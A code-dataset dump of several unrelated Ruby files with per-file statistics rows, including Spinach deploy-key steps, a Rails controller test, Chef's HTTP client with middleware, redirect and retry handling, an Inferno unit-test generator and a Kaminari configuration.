      return cached if cached

      @cache[key] = { :type => :class,
        :class => @current_class,
        :method => @current_method,
        :file => @current_file }
    end
  end

  #Return info hash for a call Sexp
  def create_call_hash exp
    target = get_target exp.target

    # If the target is itself a call (e.g. `a.b.c`), record the inner call
    # too, marking it as nested while we descend.
    if call? target
      already_in_target = @in_target
      @in_target = true
      process target
      @in_target = already_in_target
    end

    method = exp.method
    process_call_args exp

    { :target => target,
      :method => method,
      :call => exp,
      :nested => @in_target,
      :chain => get_chain(exp),
      :location => make_location }
  end
end
| 22.136585 | 79 | 0.598281 |
edf78f62f9a213f21b10ce8abb7243150ea1c6b9 | 2,631 | class Spinach::Features::ProjectDeployKeys < Spinach::FeatureSteps
include SharedAuthentication
include SharedProject
include SharedPaths

step 'project has deploy key' do
  create(:deploy_keys_project, project: @project)
end

step 'I should see project deploy key' do
  page.within '.deploy-keys' do
    expect(page).to have_content deploy_key.title
  end
end

step 'I should see other project deploy key' do
  page.within '.deploy-keys' do
    expect(page).to have_content other_deploy_key.title
  end
end

step 'I should see public deploy key' do
  page.within '.deploy-keys' do
    expect(page).to have_content public_deploy_key.title
  end
end

step 'I click \'New Deploy Key\'' do
  click_link 'New Deploy Key'
end

# Submits the new-deploy-key form with a title and a sample RSA public key.
step 'I submit new deploy key' do
  fill_in "deploy_key_title", with: "laptop"
  fill_in "deploy_key_key", with: "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzrEJUIR6Y03TCE9rIJ+GqTBvgb8t1jI9h5UBzCLuK4VawOmkLornPqLDrGbm6tcwM/wBrrLvVOqi2HwmkKEIecVO0a64A4rIYScVsXIniHRS6w5twyn1MD3sIbN+socBDcaldECQa2u1dI3tnNVcs8wi77fiRe7RSxePsJceGoheRQgC8AZ510UdIlO+9rjIHUdVN7LLyz512auAfYsgx1OfablkQ/XJcdEwDNgi9imI6nAXhmoKUm1IPLT2yKajTIC64AjLOnE0YyCh6+7RFMpiMyu1qiOCpdjYwTgBRiciNRZCH8xIedyCoAmiUgkUT40XYHwLuwiPJICpkAzp7Q== user@laptop"

  click_button "Add key"
end

step 'I should be on deploy keys page' do
  expect(current_path).to eq namespace_project_deploy_keys_path(@project.namespace, @project)
end

step 'I should see newly created deploy key' do
  page.within '.deploy-keys' do
    expect(page).to have_content(deploy_key.title)
  end
end

# Creates two other projects where the SECOND and THIRD share one deploy
# key, to verify de-duplication in the listing below.
step 'other projects have deploy keys' do
  @second_project = create(:empty_project, namespace: create(:group))
  @second_project.team << [current_user, :master]
  create(:deploy_keys_project, project: @second_project)

  @third_project = create(:empty_project, namespace: create(:group))
  @third_project.team << [current_user, :master]
  create(:deploy_keys_project, project: @third_project, deploy_key: @second_project.deploy_keys.first)
end

step 'I should only see the same deploy key once' do
  page.within '.deploy-keys' do
    expect(page).to have_selector('ul li', count: 1)
  end
end

step 'public deploy key exists' do
  create(:deploy_key, public: true)
end

step 'I click attach deploy key' do
  page.within '.deploy-keys' do
    click_link 'Enable'
  end
end

protected

# Most recent deploy key of the scenario's main project.
def deploy_key
  @project.deploy_keys.last
end

def other_deploy_key
  @second_project.deploy_keys.last
end

def public_deploy_key
  DeployKey.are_public.last
end
end
| 29.897727 | 430 | 0.749525 |
26e10c64297c0444ae0b1b93c17a59ed428e3263 | 1,524 | require 'test_helper'
# Functional tests for TranscriptLinesController's JSON API
# (index/create/show/update/destroy).
class TranscriptLinesControllerTest < ActionController::TestCase
  setup do
    @transcript_line = transcript_lines(:one)
  end

  test "should get index" do
    get :index
    assert_response :success
    assert_not_nil assigns(:transcript_lines)
  end

  test "should create transcript_line" do
    assert_difference('TranscriptLine.count') do
      post :create, transcript_line: transcript_line_params
    end

    assert_response 201
  end

  test "should show transcript_line" do
    get :show, id: @transcript_line
    assert_response :success
  end

  test "should update transcript_line" do
    put :update, id: @transcript_line, transcript_line: transcript_line_params
    assert_response 204
  end

  test "should destroy transcript_line" do
    assert_difference('TranscriptLine.count', -1) do
      delete :destroy, id: @transcript_line
    end

    assert_response 204
  end

  private

  # Attribute hash mirroring the fixture record; shared by the create and
  # update requests so the attribute list is written only once.
  def transcript_line_params
    {
      end_time: @transcript_line.end_time,
      notes: @transcript_line.notes,
      sequence: @transcript_line.sequence,
      speaker_id: @transcript_line.speaker_id,
      start_time: @transcript_line.start_time,
      text: @transcript_line.text,
      transcript_id: @transcript_line.transcript_id,
      transcript_status_id: @transcript_line.transcript_status_id
    }
  end
end
| 38.1 | 382 | 0.778871 |
016e81d12ceafd967bebf55f0a3a09e3b197e76f | 19,091 | #--
# Author:: Adam Jacob (<[email protected]>)
# Author:: Thom May (<[email protected]>)
# Author:: Nuo Yan (<[email protected]>)
# Author:: Christopher Brown (<[email protected]>)
# Author:: Christopher Walters (<[email protected]>)
# Author:: Daniel DeLeo (<[email protected]>)
# Copyright:: Copyright 2009-2018, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "tempfile"
require "net/https"
require "uri"
require "chef/http/basic_client"
require "chef/monkey_patches/net_http"
require "chef/config"
require "chef/platform/query_helpers"
require "chef/exceptions"
class Chef
# == Chef::HTTP
# Basic HTTP client, with support for adding features via middleware
class HTTP
# Class for applying middleware behaviors to streaming
# responses. Collects stream handlers (if any) from each
# middleware. When #handle_chunk is called, the chunk gets
# passed to all handlers in turn for processing.
class StreamHandler

  # @param middlewares [Array] the HTTP client's middleware stack; each
  #   middleware may contribute a stream handler for +response+ (those that
  #   return nil are skipped).
  # @param response [Net::HTTPResponse] the in-flight response being streamed
  def initialize(middlewares, response)
    middlewares = middlewares.flatten
    @stream_handlers = []
    middlewares.each do |middleware|
      stream_handler = middleware.stream_response_handler(response)
      @stream_handlers << stream_handler unless stream_handler.nil?
    end
  end

  # Passes +next_chunk+ through every collected handler and returns the
  # (possibly transformed) chunk.
  def handle_chunk(next_chunk)
    # stream handlers handle responses so must be applied in reverse order
    # (same as #apply_stream_complete_middleware or #apply_response_midddleware)
    @stream_handlers.reverse.inject(next_chunk) do |chunk, handler|
      Chef::Log.trace("Chef::HTTP::StreamHandler calling #{handler.class}#handle_chunk")
      handler.handle_chunk(chunk)
    end
  end
end
# Middleware classes registered on this client class via .use.
def self.middlewares
  @middlewares ||= []
end

# Registers a middleware class; instances are created per-client in
# #initialize, in registration order.
def self.use(middleware_class)
  middlewares << middleware_class
end

attr_reader :url
attr_reader :sign_on_redirect
attr_reader :redirect_limit
attr_reader :options
attr_reader :middlewares

# [Boolean] if we're doing keepalives or not
attr_reader :keepalives
# Create a HTTP client object. The supplied +url+ is used as the base for
# all subsequent requests. For example, when initialized with a base url
# http://localhost:4000, a call to +get+ with 'nodes' will make an
# HTTP GET request to http://localhost:4000/nodes
#
# @param url [String, URI] base URL for all requests
# @param options [Hash] supports :headers (default request headers) and
#   :keepalives (reuse connections); the full hash is also handed to each
#   middleware instance.
def initialize(url, options = {})
  @url = url
  @default_headers = options[:headers] || {}
  @sign_on_redirect = true
  @redirects_followed = 0
  @redirect_limit = 10
  @keepalives = options[:keepalives] || false
  @options = options

  # Instantiate one middleware object per registered class, in order.
  @middlewares = []
  self.class.middlewares.each do |middleware_class|
    @middlewares << middleware_class.new(options)
  end
end
# Send an HTTP HEAD request to the path
#
# === Parameters
# path:: path part of the request URL
def head(path, headers = {})
  request(:HEAD, path, headers)
end

# Send an HTTP GET request to the path
#
# === Parameters
# path:: The path to GET
def get(path, headers = {})
  request(:GET, path, headers)
end

# Send an HTTP PUT request to the path
#
# === Parameters
# path:: path part of the request URL
# json:: request body (passed through the middleware stack as-is)
def put(path, json, headers = {})
  request(:PUT, path, headers, json)
end

# Send an HTTP POST request to the path
#
# === Parameters
# path:: path part of the request URL
# json:: request body (passed through the middleware stack as-is)
def post(path, json, headers = {})
  request(:POST, path, headers, json)
end

# Send an HTTP DELETE request to the path
#
# === Parameters
# path:: path part of the request URL
def delete(path, headers = {})
  request(:DELETE, path, headers)
end
# Makes an HTTP request to +path+ with the given +method+, +headers+, and
# +data+ (if applicable). The request and response both pass through the
# middleware stack; non-success responses raise via Net::HTTP's #error!.
# A 406 (Not Acceptable) response is retried up to `version_retries` times
# to renegotiate the protocol version with the server.
def request(method, path, headers = {}, data = false)
  http_attempts ||= 0
  url = create_url(path)
  processed_method, url, processed_headers, processed_data = apply_request_middleware(method, url, headers, data)

  response, rest_request, return_value = send_http_request(processed_method, url, processed_headers, processed_data)
  response, rest_request, return_value = apply_response_middleware(response, rest_request, return_value)

  response.error! unless success_response?(response)
  return_value
rescue Net::HTTPServerException => e
  http_attempts += 1
  response = e.response
  if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
    Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
    retry
  else
    raise
  end
rescue Exception => exception
  # Log and re-raise everything else, attaching the low-level request
  # object to the exception when it supports it (for error reporting).
  log_failed_request(response, return_value) unless response.nil?

  if exception.respond_to?(:chef_rest_request=)
    exception.chef_rest_request = rest_request
  end
  raise
end
# Like #streaming_request, but yields download progress to +progress_block+
# while streaming the GET response body into +tempfile+. Returns the
# tempfile, or nil if the final response was a redirect. Retries 406
# responses (protocol version negotiation) like #request does.
def streaming_request_with_progress(path, headers = {}, tempfile = nil, &progress_block)
  http_attempts ||= 0
  url = create_url(path)
  response, rest_request, return_value = nil, nil, nil
  data = nil

  method = :GET
  method, url, processed_headers, data = apply_request_middleware(method, url, headers, data)

  response, rest_request, return_value = send_http_request(method, url, processed_headers, data) do |http_response|
    if http_response.kind_of?(Net::HTTPSuccess)
      tempfile = stream_to_tempfile(url, http_response, tempfile, &progress_block)
    end
    apply_stream_complete_middleware(http_response, rest_request, return_value)
  end
  return nil if response.kind_of?(Net::HTTPRedirection)
  unless response.kind_of?(Net::HTTPSuccess)
    response.error!
  end
  tempfile
rescue Net::HTTPServerException => e
  http_attempts += 1
  response = e.response
  if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
    Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
    retry
  else
    raise
  end
rescue Exception => e
  log_failed_request(response, return_value) unless response.nil?
  if e.respond_to?(:chef_rest_request=)
    e.chef_rest_request = rest_request
  end
  raise
end
# Makes a streaming download request, streaming the response body to a
# tempfile. If a block is given, the tempfile is passed to the block and
# the tempfile will automatically be unlinked after the block is executed.
#
# If no block is given, the tempfile is returned, which means it's up to
# you to unlink the tempfile when you're done with it.
#
# Returns nil when the final response is a redirect; retries 406 responses
# (protocol version negotiation) like #request does.
#
# @yield [tempfile] block to process the tempfile
# @yieldparams [tempfile<Tempfile>] tempfile
def streaming_request(path, headers = {}, tempfile = nil)
  http_attempts ||= 0
  url = create_url(path)
  response, rest_request, return_value = nil, nil, nil
  data = nil

  method = :GET
  method, url, processed_headers, data = apply_request_middleware(method, url, headers, data)

  response, rest_request, return_value = send_http_request(method, url, processed_headers, data) do |http_response|
    if http_response.kind_of?(Net::HTTPSuccess)
      tempfile = stream_to_tempfile(url, http_response, tempfile)
    end
    apply_stream_complete_middleware(http_response, rest_request, return_value)
  end
  return nil if response.kind_of?(Net::HTTPRedirection)
  unless response.kind_of?(Net::HTTPSuccess)
    response.error!
  end
  if block_given?
    begin
      yield tempfile
    ensure
      # Unlink the tempfile even if the block raises.
      tempfile && tempfile.close!
    end
  end
  tempfile
rescue Net::HTTPServerException => e
  http_attempts += 1
  response = e.response
  if response.kind_of?(Net::HTTPNotAcceptable) && version_retries - http_attempts > 0
    Chef::Log.trace("Negotiating protocol version with #{url}, retry #{http_attempts}/#{version_retries}")
    retry
  else
    raise
  end
rescue Exception => e
  log_failed_request(response, return_value) unless response.nil?
  if e.respond_to?(:chef_rest_request=)
    e.chef_rest_request = rest_request
  end
  raise
end
# Returns the low-level client for +base_url+ (defaults to this object's
# base url). With keepalives enabled, clients are cached per host and port
# so persistent connections survive redirects to other servers; otherwise
# a fresh client is built per call.
def http_client(base_url = nil)
  base_url ||= url
  if keepalives && !base_url.nil?
    # only reuse the http_client if we want keepalives and have a base_url
    @http_client ||= {}
    # the per-host per-port cache here gets peristent connections correct when
    # redirecting to different servers
    if base_url.is_a?(String) # sigh, this kind of abuse can't happen with strongly typed languages
      @http_client[base_url] ||= build_http_client(base_url)
    else
      @http_client[base_url.host] ||= {}
      @http_client[base_url.host][base_url.port] ||= build_http_client(base_url)
    end
  else
    build_http_client(base_url)
  end
end

# DEPRECATED: This is only kept around to provide access to cache control data in
# lib/chef/provider/remote_file/http.rb
# FIXME: Find a better API.
def last_response
  @last_response
end

private
# @api private
# Constructs a new low-level client: a socketless in-process client for
# chefzero:// URLs, otherwise a BasicClient with the API SSL policy.
def build_http_client(base_url)
  if chef_zero_uri?(base_url)
    # PERFORMANCE CRITICAL: *MUST* lazy require here otherwise we load up webrick
    # via chef-zero and that hits DNS (at *require* time) which may timeout,
    # when for most knife/chef-client work we never need/want this loaded.
    unless defined?(SocketlessChefZeroClient)
      require "chef/http/socketless_chef_zero_client"
    end

    SocketlessChefZeroClient.new(base_url)
  else
    BasicClient.new(base_url, ssl_policy: Chef::HTTP::APISSLPolicy, keepalives: keepalives)
  end
end
# @api private
def create_url(path)
return path if path.is_a?(URI)
if path =~ /^(http|https|chefzero):\/\//i
URI.parse(path)
elsif path.nil? || path.empty?
URI.parse(@url)
else
# The regular expressions used here are to make sure '@url' does not have
# any trailing slashes and 'path' does not have any leading slashes. This
# way they are always joined correctly using just one slash.
URI.parse(@url.gsub(%r{/+$}, "") + "/" + path.gsub(%r{^/+}, ""))
end
end
# @api private
# Threads [method, url, headers, data] through every middleware's
# handle_request, in registration order.
def apply_request_middleware(method, url, headers, data)
  middlewares.inject([method, url, headers, data]) do |req_data, middleware|
    Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_request")
    middleware.handle_request(*req_data)
  end
end

# @api private
# Threads the response through each middleware's handle_response in
# reverse registration order (unwinding the request-side order).
def apply_response_middleware(response, rest_request, return_value)
  middlewares.reverse.inject([response, rest_request, return_value]) do |res_data, middleware|
    Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_response")
    middleware.handle_response(*res_data)
  end
end

# @api private
# Reverse-order variant used after a streamed body has been fully consumed.
def apply_stream_complete_middleware(response, rest_request, return_value)
  middlewares.reverse.inject([response, rest_request, return_value]) do |res_data, middleware|
    Chef::Log.trace("Chef::HTTP calling #{middleware.class}#handle_stream_complete")
    middleware.handle_stream_complete(*res_data)
  end
end
# @api private
# Logs a failed request at info level, appending the server-provided
# "error" value(s) from the (possibly parsed) response body.
def log_failed_request(response, return_value)
  return_value ||= {}
  error_message = "HTTP Request Returned #{response.code} #{response.message}: "
  error_message << (return_value["error"].respond_to?(:join) ? return_value["error"].join(", ") : return_value["error"].to_s)
  Chef::Log.info(error_message)
end
# @api private
# True for 2xx (success) and 3xx (redirection) responses; everything else
# is treated as a failure by #request.
def success_response?(response)
  return true if response.kind_of?(Net::HTTPSuccess)

  response.kind_of?(Net::HTTPRedirection)
end
# Runs a synchronous HTTP request, with no middleware applied (use #request
# to have the middleware applied). The entire response will be loaded into memory.
# Returns [response, request, return_value]; follows redirects for GET/HEAD
# only, and raises Exceptions::InvalidRedirect for other verbs. When
# `http_disable_auth_on_redirect` is set (defined elsewhere in this class),
# the Authorization header is dropped on cross-host redirects.
# @api private
def send_http_request(method, url, base_headers, body, &response_handler)
  retrying_http_errors(url) do
    headers = build_headers(method, url, base_headers, body)
    client = http_client(url)
    return_value = nil
    if block_given?
      # Caller streams the body itself via the handler block.
      request, response = client.request(method, url, body, headers, &response_handler)
    else
      request, response = client.request(method, url, body, headers) { |r| r.read_body }
      return_value = response.read_body
    end
    @last_response = response

    if response.kind_of?(Net::HTTPSuccess)
      [response, request, return_value]
    elsif response.kind_of?(Net::HTTPNotModified) # Must be tested before Net::HTTPRedirection because it's subclass.
      [response, request, false]
    elsif redirect_location = redirected_to(response)
      if [:GET, :HEAD].include?(method)
        follow_redirect do
          redirected_url = url + redirect_location
          if http_disable_auth_on_redirect
            new_headers = build_headers(method, redirected_url, headers, body)
            # Never leak credentials to a different host.
            new_headers.delete("Authorization") if url.host != redirected_url.host
            send_http_request(method, redirected_url, new_headers, body, &response_handler)
          else
            send_http_request(method, redirected_url, headers, body, &response_handler)
          end
        end
      else
        raise Exceptions::InvalidRedirect, "#{method} request was redirected from #{url} to #{redirect_location}. Only GET and HEAD support redirects."
      end
    else
      [response, request, nil]
    end
  end
end
# Wraps an HTTP request with retry logic.
# HTTP 50X responses are retried with exponential backoff (unless running
# in local mode); transport-level errors (DNS, timeout, reset, refused,
# SSL) are retried with a fixed delay of http_retry_delay seconds.
# === Arguments
# url:: URL of the request, used for error messages
# @api private
def retrying_http_errors(url)
  http_attempts = 0
  begin
    loop do
      http_attempts += 1
      response, request, return_value = yield
      # handle HTTP 50X Error
      if response.kind_of?(Net::HTTPServerError) && !Chef::Config.local_mode
        if http_retry_count - http_attempts + 1 > 0
          # Exponential backoff with jitter.
          sleep_time = 1 + (2**http_attempts) + rand(2**http_attempts)
          Chef::Log.error("Server returned error #{response.code} for #{url}, retrying #{http_attempts}/#{http_retry_count} in #{sleep_time}s")
          sleep(sleep_time)
          redo
        end
      end
      return [response, request, return_value]
    end
  rescue SocketError, Errno::ETIMEDOUT, Errno::ECONNRESET => e
    if http_retry_count - http_attempts + 1 > 0
      Chef::Log.error("Error connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
      sleep(http_retry_delay)
      retry
    end
    # Mutates the message in place so the original exception class and
    # backtrace are preserved when re-raised.
    e.message.replace "Error connecting to #{url} - #{e.message}"
    raise e
  rescue Errno::ECONNREFUSED
    if http_retry_count - http_attempts + 1 > 0
      Chef::Log.error("Connection refused connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
      sleep(http_retry_delay)
      retry
    end
    # NOTE(review): raising a fresh exception here (and in the Timeout/SSL
    # rescues below) discards the original backtrace.
    raise Errno::ECONNREFUSED, "Connection refused connecting to #{url}, giving up"
  rescue Timeout::Error
    if http_retry_count - http_attempts + 1 > 0
      Chef::Log.error("Timeout connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
      sleep(http_retry_delay)
      retry
    end
    raise Timeout::Error, "Timeout connecting to #{url}, giving up"
  rescue OpenSSL::SSL::SSLError => e
    # Certificate verification failures are never retried: they will not
    # resolve themselves by waiting.
    if (http_retry_count - http_attempts + 1 > 0) && !e.message.include?("certificate verify failed")
      Chef::Log.error("SSL Error connecting to #{url}, retry #{http_attempts}/#{http_retry_count}")
      sleep(http_retry_delay)
      retry
    end
    raise OpenSSL::SSL::SSLError, "SSL Error connecting to #{url} - #{e.message}"
  end
end
# Memoized count of version negotiation attempts.
# NOTE(review): `options`/`:version_class` are not defined in this part of
# the file — presumably supplied by the enclosing class; verify at the
# call site.
def version_retries
  @version_retries ||= options[:version_class].possible_requests
end

# @api private
# Seconds to sleep between retries of failed transport-level requests.
def http_retry_delay
  config[:http_retry_delay]
end

# @api private
# Maximum number of retries for a failing request.
def http_retry_count
  config[:http_retry_count]
end

# @api private
# When truthy, the Authorization header is dropped on cross-host redirects.
def http_disable_auth_on_redirect
  config[:http_disable_auth_on_redirect]
end

# @api private
# Indirection point so tests/subclasses can substitute the config source.
def config
  Chef::Config
end
# @api private
#
# Guards recursive redirect handling: raises once redirect_limit is hit,
# otherwise bumps the depth counter and yields. The counter accumulates
# across the nested recursive calls made while following a chain, and the
# ensure clause zeroes it as the chain unwinds so the next top-level
# request starts fresh.
def follow_redirect
  raise Chef::Exceptions::RedirectLimitExceeded if @redirects_followed >= redirect_limit
  @redirects_followed += 1
  Chef::Log.trace("Following redirect #{@redirects_followed}/#{redirect_limit}")
  yield
ensure
  @redirects_followed = 0
end
# @api private
#
# True when the given URI (object or string) uses the chefzero:// scheme.
def chef_zero_uri?(uri)
  parsed = uri.respond_to?(:scheme) ? uri : URI.parse(uri)
  parsed.scheme == "chefzero"
end

# @api private
#
# Returns the Location header for genuine redirects, nil otherwise.
# Net::HTTPNotModified is an (unwanted) subclass of Net::HTTPRedirection,
# so it is explicitly excluded.
def redirected_to(response)
  return nil unless response.kind_of?(Net::HTTPRedirection) && !response.kind_of?(Net::HTTPNotModified)
  response["location"]
end
# @api private
#
# Merges per-request headers over the client defaults. Despite the name,
# +json_body+ is the already-serialized request body string (or false for
# no body); when present its byte size becomes Content-Length. Any
# custom_http_headers from Chef::Config win last.
def build_headers(method, url, headers = {}, json_body = false)
  headers = @default_headers.merge(headers)
  headers["Content-Length"] = json_body.bytesize.to_s if json_body
  headers.merge!(Chef::Config[:custom_http_headers]) if Chef::Config[:custom_http_headers]
  headers
end
# @api private
#
# Streams a response body chunk-by-chunk into a Tempfile (creating one if
# not supplied), passing each chunk through the streaming middlewares.
# Yields (bytes_written_so_far, content_length) after each chunk for
# progress reporting. Returns the closed Tempfile.
def stream_to_tempfile(url, response, tf = nil, &progress_block)
  content_length = response["Content-Length"]
  if tf.nil?
    tf = Tempfile.open("chef-rest")
    if Chef::Platform.windows?
      tf.binmode # required for binary files on Windows platforms
    end
  end
  Chef::Log.trace("Streaming download from #{url} to tempfile #{tf.path}")
  # Stolen from http://www.ruby-forum.com/topic/166423
  # Kudos to _why!
  stream_handler = StreamHandler.new(middlewares, response)
  response.read_body do |chunk|
    tf.write(stream_handler.handle_chunk(chunk))
    yield tf.size, content_length if block_given?
  end
  tf.close
  tf
rescue Exception
  # Deliberately broad: always unlink the tempfile on ANY failure, then
  # re-raise the original exception unchanged.
  tf.close! if tf
  raise
end
end
end
| 35.353704 | 155 | 0.659211 |
61728b4ca9474124ff41d772205a7f9075286552 | 7,226 | # frozen_string_literal: true
module Inferno
  module Generator
    # Accumulates ERB-generated unit-test snippets per sequence class and
    # writes them out as one minitest file per sequence.
    class USCoreUnitTestGenerator
      # Map of sequence class name => array of generated test snippets.
      # The default block ensures each new key starts with an empty array.
      def tests
        @tests ||= Hash.new { |hash, key| hash[key] = [] }
      end

      # Renders all accumulated tests for +sequence+ into
      # <path>/test/<name>_test.rb. No-op when nothing was accumulated.
      def generate(sequence, path, module_name)
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'unit_test.rb.erb')))
        class_name = sequence[:class_name]
        return if tests[class_name].blank?
        # MedicationRequest sequences get an extra canned test.
        if sequence[:resource] == 'MedicationRequest'
          tests[class_name] << ERB.new(
            File.read(
              File.join(__dir__, 'templates', 'unit_tests', 'medication_inclusion_unit_test.rb.erb')
            )
          ).result
        end
        unit_tests = template.result_with_hash(
          class_name: class_name,
          tests: tests[class_name],
          resource_type: sequence[:resource],
          module_name: module_name
        )
        test_path = File.join(path, 'test')
        FileUtils.mkdir_p(test_path) unless File.directory?(test_path)
        file_name = File.join(test_path, "#{sequence[:name].downcase}_test.rb")
        File.write(file_name, unit_tests)
      end

      # Queues a unit test for a search interaction of +resource_type+.
      def generate_search_test(
        test_key:,
        resource_type:,
        search_params:,
        is_first_search:,
        is_fixed_value_search:,
        is_status_search:,
        has_comparator_tests:,
        has_status_searches:,
        fixed_value_search_param:,
        class_name:,
        sequence_name:,
        delayed_sequence:,
        status_param:
      )
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'search_unit_test.rb.erb')))
        resource_var_name = resource_type.underscore
        # All params except the last, quoted and comma-separated.
        supported_search_params_string =
          search_params.keys
            .take(search_params.length - 1)
            .map { |value| "'#{value}'" }
            .join(', ')
        test = template.result_with_hash(
          test_key: test_key,
          resource_type: resource_type,
          resource_var_name: resource_var_name,
          search_params: search_params,
          supported_search_params_string: supported_search_params_string,
          search_param_string: search_params_to_string(search_params),
          sequence_name: sequence_name,
          is_first_search: is_first_search,
          is_fixed_value_search: is_fixed_value_search,
          is_status_search: is_status_search,
          has_comparator_tests: has_comparator_tests,
          has_dynamic_search_params: dynamic_search_params(search_params).present?,
          has_status_searches: has_status_searches,
          fixed_value_search_param: fixed_value_search_param&.dig(:name),
          fixed_value_search_string: fixed_value_search_param&.dig(:values)&.map { |value| "'#{value}'" }&.join(', '),
          fixed_value_search_path: fixed_value_search_param&.dig(:path),
          delayed_sequence: delayed_sequence,
          status_param: status_param
        )
        tests[class_name] << test
      end

      # Queues a test asserting the search requires authorization.
      def generate_authorization_test(test_key:, resource_type:, search_params:, class_name:, sequence_name:)
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'authorization_unit_test.rb.erb')))
        test = template.result_with_hash(
          test_key: test_key,
          resource_type: resource_type,
          search_param_string: search_params_to_string(search_params),
          dynamic_search_params: dynamic_search_params(search_params),
          sequence_name: sequence_name
        )
        tests[class_name] << test
      end

      # Queues a test for the resource read interaction.
      def generate_resource_read_test(test_key:, resource_type:, class_name:, interaction_test: false)
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'resource_read_unit_test.rb.erb')))
        resource_var_name = resource_type.underscore
        test = template.result_with_hash(
          test_key: test_key,
          resource_type: resource_type,
          resource_var_name: resource_var_name,
          interaction_test: interaction_test,
          no_resources_found_message: no_resources_found_message(interaction_test, resource_type),
          wrong_resource_type: resource_type == 'Patient' ? 'Observation' : 'Patient'
        )
        tests[class_name] << test
      end

      # Queues the canned chained-search test (no per-sequence variables).
      def generate_chained_search_test(class_name:)
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'chained_search_unit_test.rb.erb')))
        tests[class_name] << template.result
      end

      # Queues a profile validation test for +resource_type+.
      def generate_resource_validation_test(test_key:, resource_type:, class_name:, sequence_name:, required_concepts:, profile_uri:)
        template = ERB.new(File.read(File.join(__dir__, 'templates', 'unit_tests', 'resource_validation_unit_test.rb.erb')))
        resource_var_name = resource_type.underscore
        test = template.result_with_hash(
          test_key: test_key,
          resource_type: resource_type,
          resource_var_name: resource_var_name,
          concept_paths: path_array_string(required_concepts),
          sequence_name: sequence_name,
          profile_uri: profile_uri
        )
        tests[class_name] << test
      end

      # Message emitted by the generated test when no resources exist.
      def no_resources_found_message(interaction_test, resource_type)
        if interaction_test
          "No #{resource_type} resources appear to be available. Please use patients with more information."
        else
          "No #{resource_type} references found from the prior searches"
        end
      end

      # Renders search params as Ruby hash-literal source for the template.
      def search_params_to_string(search_params)
        search_params.map do |param, value|
          if dynamic_search_param? value
            dynamic_search_param_string(param, value)
          elsif value.start_with? '@'
            # Instance-variable reference: emit unquoted.
            "'#{param}': #{value}"
          elsif value == 'patient'
            "'#{param}': @sequence.patient_ids.first"
          else
            "'#{param}': '#{value}'"
          end
        end.join(",\n")
      end

      # Builds the source for a param whose value is resolved at test
      # runtime from a previously-fetched resource.
      def dynamic_search_param_string(param, value)
        param_info = dynamic_search_param(value)
        path = param_info[:resource_path]
        variable_name = param_info[:variable_name]
        variable_name.gsub!('[patient]', '[@sequence.patient_ids.first]')
        "'#{param}': @sequence.get_value_for_search_param(@sequence.resolve_element_from_path(#{variable_name}, '#{path}'))"
      end

      # A dynamic param value is itself generator source starting with
      # a get_value_for_search_param(...) call.
      def dynamic_search_param?(param_value)
        param_value.start_with? 'get_value_for_search_param'
      end

      # Subset of +search_params+ that are dynamic, with parsed metadata.
      def dynamic_search_params(search_params)
        search_params
          .select { |_param, value| dynamic_search_param?(value) }
          .transform_values { |value| dynamic_search_param(value) }
      end

      # From a string like:
      # get_value_for_search_param(resolve_element_from_path(@careplan_ary, 'category'))
      # this method extracts the variable name '@careplan_ary' and the path 'category'
      def dynamic_search_param(param_value)
        match = param_value.match(/(@[^,]+).*'([\w\.]+)'/)
        {
          variable_name: match[1],
          resource_path: match[2]
        }
      end

      # Quotes and comma-joins a list of element paths.
      def path_array_string(paths)
        paths.map { |path| "'#{path}'" }.join ', '
      end
    end
  end
end
| 37.440415 | 133 | 0.649045 |
f76548648695ed6f4c7456dfbbdf0949c149020c | 60 | module ConcertoWeather
module ApplicationHelper
end
end
| 12 | 26 | 0.833333 |
f744ee3c7a3e201f37d5b496fd35a35cd48d2b9e | 855 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe "Kernel#instance_variables" do
  describe "immediate values" do
    it "returns an empty array if no instance variables are defined" do
      0.instance_variables.should == []
    end

    # NOTE(review): despite the description, this example asserts that
    # setting an instance variable on an immediate raises RuntimeError
    # (immediates cannot carry ivars); it never inspects the array.
    it "returns the correct array if an instance variable is added" do
      a = 0
      lambda{ a.instance_variable_set("@test", 1) }.should raise_error(RuntimeError)
    end
  end

  describe "regular objects" do
    it "returns an empty array if no instance variables are defined" do
      Object.new.instance_variables.should == []
    end

    it "returns the correct array if an instance variable is added" do
      a = Object.new
      a.instance_variable_set("@test", 1)
      a.instance_variables.should == [:@test]
    end
  end
end
| 30.535714 | 84 | 0.692398 |
e9d2e64d0f1196c5b825e5a775c0ed7eb2c185ec | 131 | class RemoveUseridFromPackage < ActiveRecord::Migration[5.0]
def change
remove_column :packages, :user_id, :string
end
end
| 21.833333 | 60 | 0.763359 |
1ae66b2671130fa584d957d55e13c1215e9ed9a0 | 249 | Kaminari.configure do |config|
config.default_per_page = 25
config.max_per_page = 100
config.window = 2
# config.outer_window = 0
# config.left = 0
# config.right = 0
# config.page_method_name = :page
# config.param_name = :page
end
| 22.636364 | 35 | 0.698795 |
38b760a26ac52497b0bf8171fd448d79e18584db | 3,095 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
